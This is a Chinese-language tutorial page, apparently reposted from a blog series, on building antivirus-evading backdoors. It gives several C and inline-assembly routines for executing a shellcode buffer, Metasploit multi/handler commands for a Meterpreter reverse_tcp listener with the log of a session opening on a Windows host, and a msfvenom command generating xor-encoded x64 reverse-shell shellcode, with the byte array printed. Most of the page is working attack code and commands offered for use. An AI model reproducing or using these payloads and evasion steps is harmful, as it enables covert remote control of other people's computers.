Payload 实现后门分离免杀(2)

发布时间：2021-03-06 05:04 所属栏目：52 来源：网络整理

导读：此外出去上面的这种汇编形式,这里我也整理了其他的一些调用ShellCode的代码. //第1种方法 void RunShellCode_2() { ((void(*)(void))shellcode)(); } //第2种方法 void RunShellCode_3() { __asm { lea eax,shellco

此外出去上面的这种汇编形式,这里我也整理了其他的一些调用ShellCode的代码.

//第1种方法     
    void RunShellCode_2()  
    {  
        ((void(*)(void))&shellcode)();  
    }  
      
    //第2种方法  
    void RunShellCode_3()  
    {  
        __asm  
        {  
            lea eax,shellcode;  
            jmp eax;  
        }  
    }  
      
    //第3种方法     
    void RunShellCode_4()  
    {  
        __asm  
        {  
            mov eax,offset shellcode;  
            jmp eax;  
        }  
    }  
      
    //第4种方法     
    void RunShellCode_5()  
    {  
        __asm  
        {  
            mov eax,offset shellcode;  
            _emit 0xFF;  
            _emit 0xE0;  
        }  
    }

3.在MFS控制主机,启动侦听程序.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > show options

msf5 exploit(multi/handler) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888

启动我们的shellcode代码,就可看到反弹回一个shell.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888
[*] Sending stage (179779 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805)

meterpreter > sysinfo
Computer        : lyshark
OS              : Windows 10 (Build 19999).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

通过C#语言编译后门

C#的在Windows平台下的编译器名称是Csc.exe，如果你的.NET FrameWork SDK安装在C盘，那么你可以在C:\Windows\Microsoft.NET\Framework64目录中找到他的编译程序。为
了使用方便，你可以手动把这个目录添加到Path环境变量中去。

1.使用MSF工具生成后门ShellCode，并将这段ShellCode保存到lyshark.txt。

[[email?protected] ~]#  msfvenom --platform Windows -a x64 -p windows/x64/meterpreter/reverse_tcp_uuid >                               LHOST=192.168.1.30 LPORT=8080 -b '\x00' >                               -e x64/xor -i 10 -f csharp >                                -o ./lyshark.txt

如下就是生成的ShellCode代码

[[email?protected] ~]# cat lyshark.txt 
byte[] buf = new byte[951] {
0x48,0x31,0xc9,0x48,0x81,0xe9,0x8e,0xff,0x8d,0x05,0xef,0xbb,0xa9,0x1e,0xb2,0x97,0xb9,0xdc,0x04,0x58,0x27,0x2d,0xf8,0xe2,0xf4,0xe1,0x2f,0x7b,0x56,0x16,0x50,0x4f,0xfb,0xfa,0x93,0x92,0x23,0x09,0x0c,0xb8,0xa5,0xb6,0x2c,0x64,0xbd,0xa6,0x4c,0x84,0xe6,0x4d,0x68,0x5b,0x28,0x5e,0xb7,0x78,0x83,0x79,0xf9,0x46,0xfd,0x3c,0xce,0x0a,0x9a,0x03,0xc7,0x18,0x47,0x90,0xc3,0x9d,0x4a,0xe4,0x9b,0x3b,0x7e,0x4e,0x34,0x53,0xf0,0x37,0xca,0x71,0x14,0x99,0x7d,0xbf,0xdf,0x38,0x12,0x08,0x2b,0x42,0xbc,0x98,0x2a,0xf3,0xaf,0x1f,0x67,0xf1,0x35,0x9f,0xd0,0x3f,0x13,0xa2,0xf5,0x88,0xe0,0x26,0xaa,0xb0,0x02,0xa4,0xe5,0x63,0xb1,0x8c,0x75,0xd5,0x06,0xb4,0x30,0x73,0x29,0x80,0xe3,0x0f,0x19,0xd4,0xc4,0x62,0x45,0x1a,0x22,0x5f,0x91,0x0b,0x6d,0x76,0x59,0xe8,0x8a,0xa8,0x8b,0x70,0x5a,0xd8,0xb3,0x82,0xb5,0x86,0x21,0xee,0x3a,0x3d,0xda,0xf2,0x2e,0x6a,0x54,0x5c,0x51,0x36,0xd9,0x43,0xad,0x89,0x3e,0x1c,0x95,0x0d,0x10,0x96,0xc1,0x49,0xed,0xba,0x32,0x52,0x94,0xd7,0xcf,0x65,0x24,0x85,0xab,0x69,0xfc,0xd3,0xdb,0x66,0x44,0x61,0xa1,0xa7,0x20,0xd6,0x7f,0x60,0xeb,0xcd,0x57,0xe7,0x8f,0x1d,0x39,0x6c,0x6e,0xcb,0x17,0x9c,0x9e,0x0e,0xd2,0xa0,0xde,0xd1,0xae,0xf6,0xac,0x07,0xbe,0x11,0xec,0xa3,0x72,0x33,0x87,0xc6,0x40,0x74,0x01,0xea,0x77,0x55,0xc2,0x7c,0x41,0x15,0xc0,0x6f,0x04 };

通过Python语言编译后门

（编辑：ASP站长网）